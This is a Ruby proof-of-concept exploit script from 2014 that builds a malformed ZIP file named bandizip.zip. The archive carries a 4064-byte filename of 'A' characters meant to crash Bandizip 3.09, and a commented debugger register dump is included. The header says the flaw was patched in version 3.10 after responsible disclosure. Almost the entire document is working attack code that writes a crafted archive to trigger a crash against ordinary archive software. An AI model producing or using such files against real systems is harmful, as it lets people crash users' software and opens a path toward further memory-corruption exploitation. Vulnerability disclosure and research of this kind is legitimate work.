|
#!/usr/bin/env ruby
# Exploit Title: Bandizip 3.09 .zip Crash POC
# Date: February 6th 2014
# Author: Osanda Malith Jayathissa
# E-Mail: osandajayathissa<at>gmail.com
# Version: 3.09 32bit and 64bit (Below versions might be affected)
# Vendor Homepage: http://www.bandisoft.com/
# Tested on: Windows XP 32-bit SP2 en, Windows 8 64-bit
# This issue is patched in Bandizip 3.10 after a responsible disclosure
# Open this crafted file and double click on it in the app it self
=begin
eax=00000000 ebx=0374fad0 ecx=00000000 edx=00000000 esi=0374fa54 edi=00000000
eip=770be1a4 esp=0374f92c ebp=0374faac iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
770be1a4 c21400 ret 14h
=end
# Ensure we have valid ZIP Header
lf_header = "\x50\x4B\x03\x04\x14\x00\x00"
lf_header += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
lf_header += "\x00\x00\x00\x00\x00\x00\x00\x00"
lf_header += "\xe4\x0f" #file size
lf_header += "\x00\x00\x00"
cdf_header = "\x50\x4B\x01\x02\x14\x00\x14"
cdf_header += "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
cdf_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
cdf_header += "\xe4\x0f" # file size
cdf_header += "\x00\x00\x00\x00\x00\x00\x01\x00"
cdf_header += "\x24\x00\x00\x00\x00\x00\x00\x00"
eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eofcdf_header += "\x12\x10\x00\x00" # Size of central directory (bytes)
eofcdf_header += "\x02\x10\x00\x00" # Offset of start of central directory,relative to start of archive
eofcdf_header += "\x00\x00"
# Our Payload
payload = "A" * 4064
payload += ".txt"
Exploit = lf_header + payload + cdf_header + payload + eofcdf_header
f=File.open('bandizip.zip', 'w')
f.write(Exploit)
f.close
#EOF
|